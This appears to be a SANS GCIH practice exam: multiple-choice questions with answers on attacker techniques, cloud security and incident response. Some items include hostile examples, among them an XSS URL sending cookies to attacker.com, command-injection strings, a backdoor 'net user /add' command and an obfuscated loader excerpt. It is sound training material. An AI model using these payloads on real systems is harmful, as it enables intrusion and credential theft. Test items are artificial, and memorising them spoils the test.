SANS GCIH (SEC504)

Where are password hashes generally stored on modern UNIX and Linux systems? A) /etc/services B) /etc/shadow C) /etc/security D) /etc/system

B) /etc/shadow

When performing reconnaissance, what data is collected before sending any packets to the target? A) Open ingress ports B) Open-source intelligence C) A network diagram D) Open egress ports

B) Open-source intelligence

If you believe your system has been the victim of a rootkit attack, what is the most cost-effective form of eradication? A) Restore the OS from the most recent backup. B) Reformat, reinstall, and patch the system from the original media. C) Patch and reboot the compromised system. D) Install applications from a different vendor.

B) Reformat, reinstall, and patch the system from the original media.

Which of the following tools can be used on Linux to check weak passwords using dictionary-based online password guessing? A) Hydra B) Mimikatz C) netsh D) Aircrack-ng

A) Hydra

Which components of Infrastructure as a Service (IaaS) are the cloud customer responsible for securing? A) Operating system, content, applications, services. B) Application, deployment, backend services, API. C) Applications, content. D) Storage, networking, hardware.

A) Operating system, content, applications, services. In an IaaS model, the customer is responsible for securing the operating system, content, applications, and services. The cloud provider is responsible for securing the storage, hardware, and networking.

What are the phases of incident handling, in order, in the classic six-step incident response process? A) Preparation, identification, containment, eradication, recovery, and lessons learned. B) Preparation, identification, containment, eradication, recovery, and prosecution. C) Preparation, containment, eradication, recovery, retaliation, and lessons learned. D) Preparation, identification, recovery, encapsulation, eradication, and lessons learned.

A) Preparation, identification, containment, eradication, recovery, and lessons learned.

From where are OSINT data generally collected? A) Public websites and third-party API services. B) Nmap and Nessus. C) Metasploit and PowerShell Empire. D) Through exploiting a vulnerability and exfiltrating data.

A) Public websites and third-party API services.

Which of the following commands enables the forwarding of local port 8000 to host 10.10.10.100 on remote TCP port 80 through SSH? A) ssh -L 8000:10.10.10.100:80 [email protected] B) ssh -L 8000:10.10.10.10:80 [email protected] C) ssh -L 80:10.10.10.10:8000 [email protected] D) ssh -L 80:10.10.10.100:8000 [email protected]

A) ssh -L 8000:10.10.10.100:80 [email protected]

After an attacker has compromised an AWS instance, which of the following commands will the attacker use to list accessible S3 buckets? A) aws list buckets s3 B) aws s3 ls C) aws list s3 D) aws s3 buckets

B) aws s3 ls

Which attacker framework requires a hook to be loaded on an XSS-vulnerable website and has modules that allow an attacker to use the victim's browser to scan ports or deliver exploits? A) XSS Shell B) Nikto C) BeEF D) Jikto

C) BeEF An attacker can use BeEF to launch attacks on victims. In order for the attack to be delivered, the victim must execute the BeEF hook (a JavaScript file that is available on the BeEF server).

What tool can be used to efficiently scan large IP ranges, such as cloud service provider IP ranges? A) ping B) Nmap C) Masscan D) wget

C) Masscan

Which of the following tools is generally used by threat actors to extract victim passwords from memory dump files? A) Mimikatz B) Procdump C) Secretsdump D) WCE

A) Mimikatz

What method can attackers use to increase their chances of getting into a system without locking user accounts? A) Hash table B) Password spraying C) Crypto smashing D) Password guessing

B) Password spraying

An organization is concerned with drive-by attacks and has invested time and money to develop a strategic threat intelligence capability that monitors attack trends. In which phase of incident response does this occur? A) Recovery B) Preparation C) Eradication D) Containment

B) Preparation

Which step do non-discriminating attackers skip? A) Cleaning up tracks B) Reconnaissance C) Maintaining persistence D) Scanning

B) Reconnaissance

Which of the following tools can be used for executing code through unusual means to bypass AppLocker? A) DLL Load Events B) Process Hacker C) InstallUtil D) Process Creation

C) InstallUtil AppLocker intercepts process creation, PowerShell script execution, and DLL load events in the Application Identity (appidsvc) service. When a program executes, the Application Identity service checks that it is in the allow list before allowing execution to continue.The .NET Install Utility (InstallUtil) can install and uninstall Windows programs from the command line and includes functionality to launch executables via reflection. AppLocker does not sufficiently validate the source of the reflection execution, allowing an attacker to execute code

Which Hashcat attack mode lends itself well to password cracking when the target company's password complexity policy is known? A) Single crack B) Combinator C) Mask D) Straight

C) Mask The Hashcat brute-force attack (commonly referred to as a mask attack) requires you to specify the format of the password you wish to brute force. Instead of using a word list, Hashcat exhaustively tries all password combinations that match your mask pattern using the marker values specified in the table.

Which of the following is a persistence goal for attackers? A) Identify vulnerable services. B) Find the closest path to domain admin. C) Preserve privileges. D) Enumerate users and groups.

C) Preserve privileges.

An investigator identifies the following POST request. Which log recorded the activity? 1583050850.951 185 192.168.40.123 TCP_MISS/200 1856 POST https://update.googleapis.com/service/update2? -ORIGINAL_DST/172.219.10.153 text/xml A) Switch access log B) Regshot event log C) Proxy access log D) Windows event log

C) Proxy access log

Nmap sweeps through each target address before launching a port scan. When running without root privileges on a Linux machine, what type of TCP packet does it send to port 80? A) RST B) FIN C) SYN D) ACK

C) SYN

What are the components of a TCP three-way handshake, listed in the correct sequence? A) SYN, ACK, SYN B) SYN, ACK, SYN-ACK C) SYN, SYN-ACK, ACK D) SYN-ACK, ACK-SYN

C) SYN, SYN-ACK, ACK

An employee opens a malicious attachment that exploits an unpatched vulnerability. The Meterpreter payload launches and connects to TCP port 443 of an attacker-controlled IP address. The organization's firewall permits outbound connections to any IP address on TCP port 443. Which security device could still prevent the attacker from taking control of the system? A) Static firewall B) Network access controller C) Web proxy D) Stateful inspection firewall

C) Web proxy

Which command can be used to find Azure storage instances? A) bucket_finder.rb words --download B) gcpbucketbrute.py -u -k names C) basicblobfinder.py namelist D) gsutil ls gs://findit

C) basicblobfinder.py namelist Basic Blob Finder is a tool used to scan for and identify Azure Blobs. Since Azure Blobs are identified by an account name and a container name, Basic Blob Finder accepts a list of strings, optionally separated by a colon. Entries of a single string are used as both the account name and the container name; entries with a colon delimit the account name and the container name. Basic Blob Finder will identify publicly accessible Azure Blobs and enumerate the files in the Blob.

Which of the following Living Off the Land (LotL) tools can be used instead of cURL or Wget? A) wmic B) schtasks C) certutil D) cmd

C) certutil With limited options on what can be executed on a compromised system, attackers often turn to a technique known as living off the land (LOL). The attacker changes techniques to accomplish goals using what is allowed on the system. For example, if an attacker needs to download a script from a staging website, they do not need to upload and run cURL or Wget, as that can be accomplished using the built-in, Microsoft-signed, Certutil utility.

During an incident response, you notice that the following command was issued. What was being done? C:\> net localgroup administrators A) The list of user accounts in the administrators group was being displayed. B) The localgroup was being added to the administrators group. C) The list of user accounts in the localgroup and administrators group was being displayed. D) Info was being displayed for the localgroup and administrators user accounts.

A) The list of user accounts in the administrators group was being displayed.

Which SQL clause can be used by an attacker to combine new SQL queries with the prior query results in an SQL injection attack? A) UNION B) COMBINE C) MERGE D) ADD

A) UNION

Which of the following can be an effective defense against SQL injection attacks? A) Using parameterized queries. B) Filtering user input at the client side. C) Ensuring all data are HTML-encoded. D) Filtering user input with quotation of double-quote (" ") only.

A) Using parameterized queries. Developers should build their web applications to use parameterized queries, as opposed to building SQL statements through string concatenation. Using parameterized queries eliminates any risk of SQL injection, is simpler for most programmers, and improves database performance.

Why is performing memory analysis on RAM images a staple of investigations? A) Valuable information may exist in RAM, which might not be found on disk. B) Speed - Evidence from a RAM image will match disk content. C) RAM provides more consistent images than disk. D) It's easier to look for historical information in RAM than on disk.

A) Valuable information may exist in RAM, which might not be found on disk.

Which type of system is most commonly used to investigate malware? A) Virtual machine B) Day-to-day host C) Thick client D) Production system

A) Virtual machine

DeepBlueCLI searches which of the following to find unusual behavior or characteristics? A) Windows event logs B) Windows registry hives C) Windows running processes D) Windows Volume Shadow Copy

A) Windows event logs

Real Intelligence Threat Analytics (RITA) detects known and yet-undiscovered attacker C2. What is the type of input that should be passed to RITA? A) Zeek logging data. B) Real-time network traffic. C) Packet capture files. D) Snort logging data.

A) Zeek logging data.

What gives an attacker all records associated with a DNS domain? A) Zone transfer B) Reverse lookup C) DNS lookup D) Record transfer

A) Zone transfer

What is the endpoint URL format for storage accounts in Microsoft Azure? A) https://ACCOUNTNAME.blob.core.windows.net/CONTAINERNAME B) https:// CONTAINERNAME.blob.windows.com/ C) https://s3.azure.com/BUCKETNAME D) https://www.microsoft.com/storage/v1/b/BUCKETNAME

A) https://ACCOUNTNAME.blob.core.windows.net/CONTAINERNAME

Which of these tools is available online to run a malware specimen through a sandbox to record activities performed by the malware in a virtual environment? A) Domain Tools B) Hybrid Analysis C) VirusTotal D) SandBoxer

B) Hybrid Analysis Hybrid Analysis allows you to upload a malware specimen and choose a virtual machine environment in which to run the specimen. Hybrid Analysis records how the malware behaves within the virtualized environment.

In which mode does John the Ripper perform a brute-force password-cracking attack? A) Wordlist mode B) Incremental mode C) External mode D) Single-crack mode

B) Incremental mode

In what way is logging API access to a cloud environment a major incident response benefit? A) It helps to provide detailed insight into network activity for analysis. B) It helps to understand the scope of the breach and the actions taken by an attacker. C) It provides verification of breached data access. D) It provides full packet capture visibility.

B) It helps to understand the scope of the breach and the actions taken by an attacker. API access logs include all programmatic access to cloud services, identity and key use, and a record of attacker tactics used to exploit the cloud. These are the most useful data for understanding the scope of a breach and the actions taken by the attacker.

While attempting to pull hashes from memory on a Windows 10 system using Meterpreter hashdump, you receive the following error: "priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect." What could you do to obtain the hashes from memory? A) Run the getprivs command in Meterpreter and then run hashdump. B) Migrate to the lsass.exe process and then run hashdump. C) Restart Metasploit with root privileges. D) Run the command again, since it sometimes takes a few tries for commands to run properly.

B) Migrate to the lsass.exe process and then run hashdump. With modern changes to how Microsoft protects password hash data, the hashdump command will fail with the error "priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect." To work around this problem, first you have to move the Meterpreter instance from the initial process to one running inside of lsass.exe.

What are two basic approaches commonly employed when investigating malware? A) Running a penetration test and running a vulnerability scan. B) Monitoring the environment and examining code. C) Taking the environment offline and restoring from backups. D) Performing a risk assessment and confirming a possible exploit type.

B) Monitoring the environment and examining code.

Which of the following is a program that can move data across a network using user-assigned TCP or UDP ports and works on Windows, Mac, and Linux? A) Nmap B) Netcat C) ping D) SCP

B) Netcat

Which of the following attacks could have a significant impact on cloud targets as it could disclose instance metadata? A) Cookie harvesting B) SSRF C) SQL injection D) XSS

B) SSRF Server-side request forgery (SSRF) attacks are not unique to cloud targets since they can expose any web application functionality, but this vulnerability introduces greater risk when applied against cloud targets.For many web applications, the web server will accept input from the user and use the input to form a web request of its own. For example, if a user supplies a link to an image file as part of user profile avatar creation, the web server will accept that URL and request the image from the target web server. If an attacker can manipulate the input to get the server to make arbitrary HTTP requests, then the server is vulnerable to SSRF attacks. This can lead to a web server compromise, possibly disclosing sensitive cloud authentication tokens through the Instance Metadata Service (IMDS).

What step should always be taken first during an incident? A) Identifying which systems are unpatched. B) Verifying whether an incident occurred. C) Determining which threat intelligence feeds to query. D) Choosing which systems to rebuild.

B) Verifying whether an incident occurred.

Which of the following is an important consideration when using Sqlmap? A) You must supply an error-generating URL. B) You must always put the URL in quotes. C) The use of quotes on the URL is optional. D) Database tables are dropped unless the --no-drop option is used.

B) You must always put the URL in quotes. Always put the URL in quotes. Many URLs contain ampersands (&). If the user does not put the URL in quotes, the shell prompt will interpret the ampersand as a shell meta-character and will not supply all the data parameters for SQL injection testing to Sqlmap.

After an attacker has compromised an AWS instance, which of the following commands serves as a basic access test that attackers use to identify the username associated with stolen access keys? A) aws iam get-caller-identity B) aws sts get-caller-identity C) aws sts get-username D) aws sts get-user-id

B) aws sts get-caller-identity

Who should make the decision of when to put a system back into production? A) Systems administrators B) Business team C) Security team D) Data owner

B) Business team

An attacker downloads a PDF from a target's website and wants to exploit a vulnerability in the PDF. What tool can the attacker use to view information about the tool that was used to create the PDF? A) Exiftool B) Pdflist C) Exifpdf D) Listpdf

A) Exiftool

What does it mean for a cloud bucket to be listable? A) Files can be both enumerated and downloaded. B) Files can only be downloaded. C) Files can be uploaded. D) Files can only be enumerated.

A) Files can be both enumerated and downloaded. If a bucket is listable, an attacker can enumerate and download all the files. This represents an information disclosure threat.

Which of the following is a challenge of working with OSINT data? A) Converting different HTML and XML versions. B) Properly decrypting various data sources. C) Collecting from numerous and disparate data sources. D) Using bitcoin to pay for access to data services.

C) Collecting from numerous and disparate data sources.

What tool is used to record the state of the registry before and after malware is executed on an analysis system? A) Regshot B) Ollydbg C) Wireshark D) Regripper

A) Regshot

Which of the following tools uses a "high-low" strategy, splitting a file into pieces and scanning it repeatedly until the smallest data chunk that triggers a threat alert is found? A) YARA B) DefenderCheck C) Veil framework D) msfvenom

B) DefenderCheck

Which Metasploit payload shovels a shell back to the attacker on a TCP port? A) Inject control B) Port binder C) Bind shell D) Reverse shell

D) Reverse shell

The adversary tactics, techniques, and procedures from the MITRE ATT&CK Framework are based on which of the following? A) Observations from real-world attacks. B) Open Web Application Security Project (OWASP). C) Cutting-edge security research papers. D) Vulnerability databases.

A) Observations from real-world attacks.

Which of the following PowerShell cmdlets can provide useful information to identify attacker WMI-based persistence? A) Get-Autoruns B) Get-WMIObject C) Get-WMIEvent D) Get-WMI

B) Get-WMIObject The Windows Get-WMIObject cmdlet can provide information about WMI event subscriptions that will help defenders identify any WMI-based persistence on Windows endpoints.

The following line was extracted from the /etc/shadow file of a Linux system. Which of the following hash encryption functions was used by the system to generate the output? sec504:$6$1ArFQuUX$qhCcp4hKJvWxf47bm3QiFs3CldfvKy/z28wN24GuOwBfcgOF8j2iYgll5eFPyMQ0Hzf.PyXrIqE3FpnF4vdPq.:17317:0:99999:7::: A) SHA-512 B) SHA-256 C) Blowfish D) MD5

A) SHA-512 When looking in the /etc/shadow file, the password hash is the second colon-delimited field. $6 is used for SHA-512, $5 is used for SHA-256, $2 is used for Blowfish, and $1 is used for MD5.

What is the following Google search designed to do? wireless site:somecompany.net A) Search for all instances of the term "wireless" on the somecompany.net website B) Display all pages containing both the terms "somecompany.net" and "wireless site" C) Find pages similar to somecompany.net that also mention the term "wireless" D) Display all pages with the term "wireless" in them that link to somecompany.net

A) Search for all instances of the term "wireless" on the somecompany.net website

When Netcat is used in client mode, messages from the tool itself associated with the connection are sent to which of the following? A) Standard error B) Standard input C) Standard output D) Standard input and output

A) Standard error Messages from Netcat associated with the connection (such as error conditions) are sent to standard error. This makes Netcat very flexible, because errors will not be put in stdout and therefore will not corrupt anything you want to capture from the network

A system administrator pulled the following password hashes from a web application. Based on these password hashes, what do you know? alice:26ab0db90d72e28ad0ba1e22ee510510 barry:b026324c6904b2a9cb4b88d6d61c81d1 becky:6d7fce9fee471194aa8b5b6e47267f03 cindy:869c5758c412a4b16c682c2f983a804f peter:869c5758c412a4b16c682c2f983a804f leann:869c5758c412a4b16c682c6af517398f sarah:26ab0db93c9c6e1b9b6252c8395efdc1 vivek:31d30eea8d0968d6458e0ad0027c9f80 A) Cindy and Peter have identical passwords. B) Each hash value was calculated using a different salt value. C) Peter and Leann have passwords that are similar. D) The passwords were hashed with the HMAC-MD5 algorithm.

A) Cindy and Peter have identical passwords.

Which of the following defenses protects against XSS but not SQL injection attacks? A) Content Security Policy B) Input validation C) Filtering dangerous characters D) Parametrized queries

A) Content Security Policy One defense against cross-site scripting (XSS) attacks is using the Content Security Policy (CSP) header on web servers to declare where linked resources can be loaded from in the requested page by the browser.

Which of the following techniques can help mitigate command injection attacks in the short term while application vulnerabilities are resolved? A) Deploying a WAF. B) Using parameterized queries. C) Implementing application allow-listing. D) Verifying all the code and fixing the web application.

A) Deploying a WAF.

During the remediation phase of incident response, you remove a file from your infected web server. What is the most important additional thing to do to prevent being compromised again? A) Determine the root cause of the attack. B) Review your host-based firewall rules. C) Restore the host data from backups. D) Apply patches and harden the system.

A) Determine the root cause of the attack.

How often is the SRUM database updated? A) Every hour and at system shutdown. B) Every five minutes and at system shutdown. C) Immediately after every monitored action is done. D) Every fifteen minutes and at system shutdown.

A) Every hour and at system shutdown.

A security consultant is making recommendations for a customer who is still using Windows Server 2003 in their environment. Which hashing mechanism listed below should the security consultant recommend be removed from the customer's environment? A) LANMAN B) NTLMv1 C) NT D) NTLMv2

A) LANMAN The LANMAN password-hashing mechanism is very weak and highly susceptible to password recovery attacks, even for complex passwords.

What type of endpoint bypass attack is this C# code for Windows? static void Main(string[] args) { Microsoft.Scripting.Hosting.ScriptEngine pythonEngine = IronPython.Hosting.Python.CreateEngine(); Microsoft.Scripting.Hosting.ScriptSource pythonScript = pythonEngine.CreateScriptSourceFromString("exec(__import__('base64') .b64decode(__import__('codecs').getencoder('utf-8')('cAByAGkAbgB0ACgAJw...KQA=')[0]))"); pythonScript.Execute(); A) Obfuscating malware to bypass threat detection capabilities. B) Disabling endpoint detection to allow malware. C) Leveraging permitted tools to run malware. D) Modifying malware to evade signature analysis.

A) Obfuscating malware to bypass threat detection capabilities. In a code wrapping and obfuscation endpoint evasion attack, the attacker takes malicious code, builds a new program around it using an intermediate wrapping library to execute their code (such as Python, Rust, Golang, or many other languages), and compiles it as a native Windows executable.This is an excerpt of a C# program that uses the IronPython library to execute obfuscated Python code natively in a C# program. An attacker can use a C# program to execute any Metasploit payload. After embedding the obfuscated Meterpreter payload in the C# source, the attacker can build a new executable using Microsoft Visual Studio.

Which of the following user accounts is targeted by an attacker to forge a Golden Ticket with the user password hash? A) Any domain admin account B) krbtgt C) Administrator D) SYSTEM

B) krbtgt Windows systems use Kerberos as a modern authentication mechanism, allowing untrusted devices in a network to verify the identity and authorization for users and services. In a Kerberos network, there is an attack known as the Golden Ticket attack. There are four steps to this attack that can grant an attacker unauthorized access and persistence to the network: 1. First, the attacker must compromise a domain controller. This could be through an exploit that grants domain administrator privilege but could also be achieved through a compromised backup. 2. Next, the attacker must retrieve the krbtgt user password hash. 3. Once the attacker has the krbtgt password hash, the hash can be used to forge arbitrary Ticket Granting Tickets (TGTs) using Mimikatz or Impacket. 4. With the ability to forge TGTs, an attacker can skip the Kerberos authentication process altogether, simply supplying the forged and trusted ticket to any service on the network, including remote access, database authentication, and local privilege escalation.

Which of the following commands can be used to create a user account on a Windows system through a non-interactive prompt? A) net account /add assetmgtacct Att@ckerPassw B) net user /add /usr assetmgtacct /password MyH@ckerPass43 C) net user /add assetmgtacct Att@ckerPassw D) net user /add assetmgtacct pwned

C) net user /add assetmgtacct Att@ckerPassw The only command that would create an account on a non-interactive command is "net user /add assetmgtacct Att@ckerPassw". "net user /add assetmgtacct pwned" would fail on most Windows systems because it does not meet the minimum password complexity requirements (between 8 and 14 characters) and would produce an interactive prompt that will cause the command to fail. The other options have invalid syntax.

Which of the following tools can be utilized in a Linux system to search for the username associated with a specific SID? A) wmic useraccount list brief B) net view C) rpcclient D) enum

C) rpcclient The rpcclient tool is valuable for collecting information from a target SMB server. Originally created as a troubleshooting and debugging tool for the Samba suite, rpcclient is capable of interrogating the RPC services of a target Windows system. The rpcclient lookupnames command can be used to identify the username associated with a security identifier (SID).

Which command will display ASCII and Unicode strings within a malware sample? A) cat B) Get-Strings C) strings D) findstr

C) strings

A security analyst is tasked with auditing network login accounts for insecure passwords. The analyst plans on going through each account and interactively logging in to the account with a list of bad passwords. Why is this a bad idea? A) The script required to create the list of user accounts may be detected by EDR tools. B) It is not a bad idea; looping through a list of passwords is more efficient than trying the same password on each user account. C) A high number of login attempts could trigger an account lockout. D) Compared to other password-cracking methods, using wordlists takes the longest amount of time.

C) A high number of login attempts could trigger an account lockout.

In a packet capture, an analyst observes that a system sent a frequent, small, outbound communication to a known bad IP, over a seven-day period. What type of behavior is possibly occurring? A) Ack scan B) Fragmentation C) Beaconing D) Traceroute

C) Beaconing

Using the following URL, what is the application vulnerable to if userData.pl responds with the output of nslookup? http://AFineWebApp/cgi-bin/userData.pl?doc=user1.txt;nslookup MyEvilMachine.com A) Cross-site scripting B) Session manipulation C) Command injection D) SQL injection

C) Command injection

Which of the following is a challenge presented to an attacker when scanning cloud targets as opposed to non-cloud targets? A) Potential to bypass ACL filters B) May reveal information about non-cloud assets C) Difficult to identify the owner of a given target D) Less likely to be monitored and logged

C) Difficult to identify the owner of a given target

Which of the following is a defense against hijacking attacks? A) Disabling LM hashes B) Disabling SMB C) Disabling LLMNR D) Disabling Wdigest

C) Disabling LLMNR To defend against Responder and LLMNR attackers, it is important to disable LLMNR support on servers and workstations. LLMNR was once valuable as a mechanism for small workgroups to refer to other entities by name without a centralized DNS server, but it is rarely needed in modern organizations.

What type of log could be used to identify cloud storage use in your organization? A) Reverse proxy log B) DHCP log C) HTTP proxy log D) Application log

C) HTTP proxy log

Which of the following XSS attacks requires some social engineering effort in conjunction with exploitation of web server-side input processing weaknesses to complete? A) Stored cross-site scripting attack. B) Embedded cross-site scripting attack. C) Reflected cross-site scripting attack. D) DOM-based cross-site scripting attack.

C) Reflected cross-site scripting attack. In a reflected XSS attack, the attacker identifies a server input validation vulnerability in one of the parameters of an HTTP GET request that is subsequently displayed (or reflected) in the output returned to the requesting client. Unlike the stored XSS attack, the reflected XSS attack requires some social engineering, such as sending the victim a specially crafted link. If the victim clicks on this link, the attack will complete by running the malicious code included in the attacker link.

Which of the following defenses can help characterize data transfer totals and apps used after an attacker has exfiltrated data from a Windows victim host? A) Restrictive filesystem permissions B) Egress firewall rules C) SRUM D) Application whitelisting

C) SRUM Following a compromise, incident responders can use SRUM data to characterize data transfer tools by app name, which can be valuable for characterizing the amount and possible sources of data extracted from a compromised system.

Which of the commands below would assist with reviewing logging information from Amazon Web Services? A) basicblobfinder.py -get-all-blobs B) aws ec2 describe-volumes | jq -r '.Volumes[] | select ( .AvailabilityZone | contains("us-east-1") ) | .VolumeId' C) aws s3 describe-logs | parse D) s3logparse.py useragent sec504-erk20*

D) s3logparse.py useragent sec504-erk20* Several tools are available to assist with manual review of logging information. Windows event logs can be queried using PowerShell cmdlets such as Get-EventLog and Get-WinEvent, or with the command-line tool wevtutil. Purpose-built tools for reviewing logging information are available for almost all cloud log file formats, including s3logparse.

What is a bucket squatting attack? A) Scanning for buckets with public access. B) Exfiltrating data using cloud storage buckets. C) Uploading and using web shells against buckets with public writable permissions. D) Registering a bucket that uses an organization name.

D) Registering a bucket that uses an organization name.

Which of the following common web attack techniques targets the supporting database of an application? A) XSS B) Path traversal C) Command injection D) SQL injection

D) SQL injection

As attackers adapt new C2 and exfil techniques, traditional IDS becomes less effective at identifying threats. Which of the following techniques can be used to detect C2 that is commonly missed by traditional IDS techniques? A) Predictive analysis B) Signature-based detection C) Payload content analysis D) Statistical anomaly analysis

D) Statistical anomaly analysis

Which Sysinternals tool can be used to collect detailed log event information for security information and event monitoring and analysis? A) Process Monitor B) Autoruns C) Procdump D) Sysmon

D) Sysmon Sysmon is a service and driver that can be configured to collect detailed event information. This is valuable when combined with an event monitoring tool such as a SIEM or Windows Event Collection.

Which Metasploit module category makes the target do something the attacker wants? A) The exploit. B) The post module. C) The auxiliary module. D) The payload.

D) The payload.

Which characteristic distinguishes watering hole attacks from drive-by attacks? A) Watering hole attacks target vulnerabilities in email clients. B) Watering hole attacks are focused only against an individual. C) Watering hole attacks target individuals mainly through email. D) Watering hole attacks target a specific victim group.

D) Watering hole attacks target a specific victim group.

Which of the following Metasploit modules can be used for pivoting (lateral movement) through a compromised host? A) auxiliary/server/portfwd B) post_exploitation/server/socks5 C) lateral_movement/socks4a D) auxiliary/server/socks4a

D) auxiliary/server/socks4a Attackers can reuse their command and control (C2) access by pivoting and gaining access to new hosts in the network. A powerful example of this is the Meterpreter C2 framework, deployed either as a part of the initial exploit or through an independent payload generated using MsfVenom.An attacker can start a proxy server on their system with auxiliary/server/socks4a and relay traffic through the pivot (compromised host) by reusing the Meterpreter session with a new route to the internal target.

Which of the following Metasploit modules allows an attacker to create a persistent service on a Windows target? A) exploit/persistence/windows/persistent_service B) exploit/post-compromise/local/service C) exploit/windows/persistence/service D) exploit/windows/local/persistence_service

D) exploit/windows/local/persistence_service

Which of the following is an example of a command injection attack on a Linux application? A) foo.jpg # whoami B) foo.jpg 'or '1'='1 C) foo.jpg -- whoami D) foo.jpg; whoami

D) foo.jpg; whoami

Which file should not be left behind after a password audit conducted with John the Ripper? A) passwd B) results.txt C) password.txt D) john.pot

D) john.pot The john.pot file includes all the passwords that John the Ripper is able to recover from a file containing password hashes. Security auditors must remember to remove this file when finished with a password audit that uses John the Ripper.

In the following pstree output, which process spawned cmd.exe, which is not normal behavior? 0x8b1b4680:dllhost.exe 356 520 2020-01-18 04:19:55 UTC+0000 .0x89a412c0:csrss.exe 368 356 2020-01-18 04:19:48 UTC+0000 ..0x802f61c0:services.exe 520 448 2020-01-18 04:19:48 UTC+0000 ...0x8ac77040:svchost.exe 628 520 2020-01-18 04:19:49 UTC+0000 ..0x802fc500:lsass.exe 528 448 2020-01-18 04:19:48 UTC+0000 ...0x89766cc0:cmd.exe 920 528 2020-01-18 04:29:17 UTC+0000 ....0x896a8600:find.exe 1208 920 2020-01-18 04:31:27 UTC+0000 A) services.exe B) csrss.exe C) find.exe D) lsass.exe

D) lsass.exe

Which of the following built-in commands allows port forwarding on Windows? A) wmic B) plink C) route D) netsh

D) netsh On Windows systems, the netsh command has a built-in feature to start listening on an arbitrary port number and forwarding any activity to a remote IP address and TCP port. Unlike Meterpreter portfwd or SSH tunneling, the listening port in this example is on the victim system itself, not the attacker system. An attacker can still use this for pivoting and to obscure the source of the attack on the network, but it requires that they can connect to the victim system on the listening port.

How many days of historical data are saved in the System Resource Usage Monitor database? A) 45 B) 90 C) 15 D) 30

D) 30

While reviewing logs from a web server, a web administrator notices that every page on a company's site was accessed within a span of six minutes. What is this indicative of? A) A web hoster B) A web walker C) A web skipper D) A web crawler

D) A web crawler

What method could be used to ensure that an asset under investigation is not put back into production without approval before the investigation is complete? A) Move the asset to a different cloud data center. B) Terminate the asset. C) Shut off all administrative access to the cloud environment so no admins can make changes. D) Add an "under investigation" tag to the asset.

D) Add an "under investigation" tag to the asset.

Which of the following is the best mitigation against password-cracking attacks that target Windows systems? A) Deploying Exploit Guard and virtualization isolation. B) Requiring long passphrases rather than complex passwords. C) Requiring NTLMv2 password hashes. D) Deploying multi-factor authentication.

D) Deploying multi-factor authentication.

Which of the following attacks can be used to deliver an exploit to a user browsing the Internet through a seemingly innocuous website? A) Server-side B) SQL injection C) XSS D) Drive-by

D) Drive-by

What is the first step attackers take when engaging in a password-cracking attack against an organization? A) Access high-value targets. B) Crack password hashes for as long as necessary. C) Dump available password hashes. D) Exploit a low-value target.

D) Exploit a low-value target. Attackers will commonly seek to exploit a system of low-to-medium importance as the first step in cracking passwords. A system of lower importance is less likely to be hardened against attacks, less likely to be closely monitored, and may even be relatively neglected. This makes the system of lower importance an ideal target to exploit and gain a foothold, dumping all available password hashes, cracking those hashes, and reusing the recovered passwords to access high-importance targets

An attacker uses the following URL. What are they attempting to do? http://counterhack.net/search.php?word=< (plus) script >document.location= (plus) 'http://attacker.com/save.php?c='+document.cookie</ (plus) script> A) Manipulate the search results returned from the victim's browser. B) Search the target site for functionality that does not filter user-supplied input. C) Redirect a victim to the attacker's clone of a web page. D) Get a cookie that a victim has stored in their browser.

D) Get a cookie that a victim has stored in their browser.

What header field in IPv6 is similar to the TTL field in an IPv4 header? A) Flow Label B) Class C) TTL D) Hop Limit

D) Hop Limit

Which of the following is a characteristic of UDP? A) Its sequence numbers are preserved. B) It is connection oriented. C) It uses acknowledgments. D) It is connection-less.

D) It is connection-less.

What tool is designed to work with and parse JSON data? A) jayson B) jquery C) jsonparse D) JQ

D) JQ JQ is a lightweight tool and programming language written by Stephen Dolan for parsing, interrogating, and editing JSON data. Although it is technically a programming language, JQ can be easy to get started with, making it simple to take complex JSON data and format it for easy reading. JQ can also be quite complex, using a variety of built-in and custom functions to process JSON data.

Which of the following protocols can be abused by Responder in a hijacking attack to impersonate servers and harvest credentials? A) ARP B) DHCP C) Kerberos D) LLMNR

D) LLMNR In a hijacking attack, an adversary responds to system requests for services (such as name resolution requests) and pretends to be the legitimate system. While this sometimes involves the use of machine-in-the-middle (MitM) attacks, it can also operate by observing broadcast requests for services on the LAN and injecting responses that will be processed by client systems. For an adversary, one powerful opportunity is to respond to broadcast requests for weak name resolution protocols such as the Link-Local Multicast Name Resolution (LLMNR) protocol, pretend to be a server by launching several services, and trick the victim into sending authentication credentials to the attacker.

Which TCP flag indicates that a connection should be torn down abruptly? A) ACK B) FIN C) URG D) RST

D) RST

Which Nmap command will disable port scanning and focus solely on host discovery? sudo nmap -sC 192.168.1.1-254 sudo nmap -Pn 192.168.1.1-254 sudo nmap -sn 192.168.1.1-254 sudo nmap -sS -sV 192.168.1.1-254

sudo nmap -sn 192.168.1.1-254